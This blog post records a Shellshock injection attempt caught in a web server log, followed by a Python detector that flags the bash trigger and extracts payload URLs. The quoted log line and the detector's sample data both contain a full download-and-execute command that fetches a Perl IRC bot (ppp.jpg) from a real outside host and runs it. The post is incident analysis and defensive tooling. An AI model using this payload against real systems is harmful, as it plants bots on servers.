Wednesday, 15 April 2015

ppp.jpg (Perl-based malware) Addbot

On the 7th of April a shellcode injection attempt hit my system.
The goal was to download and execute Perl-based malware.
46.4.73.171 - - [07/Apr/2015:03:54:15 +0200] "GET / HTTP/1.1" 404 442 "() { :;}; /bin/bash -c \"echo 109.234.106.8/ ;cd /tmp;curl -sO http://210.1.61.133/~leelawadee/model/code/ppp.jpg;wget -q http://210.1.61.133/~leelawadee/model/code/ppp.jpg;perl ppp.jpg;rm -fr ppp.jpg; echo 109.234.106.8/ ;cd /var/spool/samba; curl -sO http://210.1.61.133/~leelawadee/model/code/ppp.jpg;wget -q http://210.1.61.133/~leelawadee/model/code/ppp.jpg;perl ppp.jpg;rm -fr ppp.jpg\"" "() { :;}; /bin/bash -c \"echo 109.234.106.8/ ;cd /tmp;curl -sO http://210.1.61.133/~leelawadee/model/code/ppp.jpg;wget -q http://210.1.61.133/~leelawadee/model/code/ppp.jpg;perl ppp.jpg;rm -fr ppp.jpg; echo 109.234.106.8/ ;cd /var/spool/samba; curl -sO http://210.1.61.133/~leelawadee/model/code/ppp.jpg;wget -q http://210.1.61.133/~leelawadee/model/code/ppp.jpg;perl ppp.jpg;rm -fr ppp.jpg\""
The ppp.jpg file is actually a Perl script.
Driven by my basic knowledge of Perl, I would assume that it is an IRC-controlled bot used to access Google and other search engines to ensure a better page ranking.
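A small detector for this kind of attempt, added here as an example and not part of the original post: it parses Apache combined-format lines, flags the bash function-definition trigger (Shellshock) in the request, referer or user-agent field, and extracts the second-stage download URLs a responder would block or hunt for. The sample log entries are constructed; the second one is shortened from the line quoted above and keeps its source IP and download URL.

```python
import re
from urllib.parse import urlparse

# Apache combined log format; the three quoted fields may contain \" escapes.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<request>(?:[^"\\]|\\.)*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>(?:[^"\\]|\\.)*)" "(?P<ua>(?:[^"\\]|\\.)*)"$'
)
# Bash function-definition trigger (Shellshock) smuggled in an HTTP header.
SHELLSHOCK_RE = re.compile(r'\(\)\s*\{\s*:;\s*\};')
# Stop at ; " ' \ or whitespace so chained shell commands do not bleed into the URL.
URL_RE = re.compile(r'https?://[^\s;"\'\\]+')

# Constructed sample: one benign request, then a line shortened from the
# attempt recorded in the post above (same source IP and download URL).
SAMPLE_LOG = [
    '192.0.2.10 - - [07/Apr/2015:03:50:00 +0200] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
    '46.4.73.171 - - [07/Apr/2015:03:54:15 +0200] "GET / HTTP/1.1" 404 442 '
    '"() { :;}; /bin/bash -c \\"cd /tmp;curl -sO http://210.1.61.133/~leelawadee/model/code/ppp.jpg;perl ppp.jpg;rm -fr ppp.jpg\\"" '
    '"() { :;}; /bin/bash -c \\"cd /tmp;wget -q http://210.1.61.133/~leelawadee/model/code/ppp.jpg;perl ppp.jpg\\""',
]

def parse_line(line):
    """Split one combined-format line into its fields, or None if it does not parse."""
    m = LOG_RE.match(line.rstrip("\n"))
    return m.groupdict() if m else None

def find_shellshock(line):
    """Return a hit record for a line carrying the trigger, else None."""
    rec = parse_line(line)
    if rec is None:
        return None
    fields = [f for f in ("request", "referer", "ua") if SHELLSHOCK_RE.search(rec[f])]
    if not fields:
        return None
    urls = sorted(set(URL_RE.findall(rec["referer"] + " " + rec["ua"])))
    return {
        "src_ip": rec["ip"],
        "timestamp": rec["ts"],
        "fields": fields,                      # where the trigger was found
        "download_urls": urls,                 # second-stage payload locations
        "download_hosts": sorted({urlparse(u).hostname for u in urls}),
    }

def scan(lines):
    """Run the detector over an iterable of log lines and collect the hits."""
    return [hit for hit in (find_shellshock(line) for line in lines) if hit]
```

Running scan(SAMPLE_LOG) yields one hit, with the trigger seen in both the referer and user-agent fields and a single download host to act on.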

For more details please visit VirusTotal.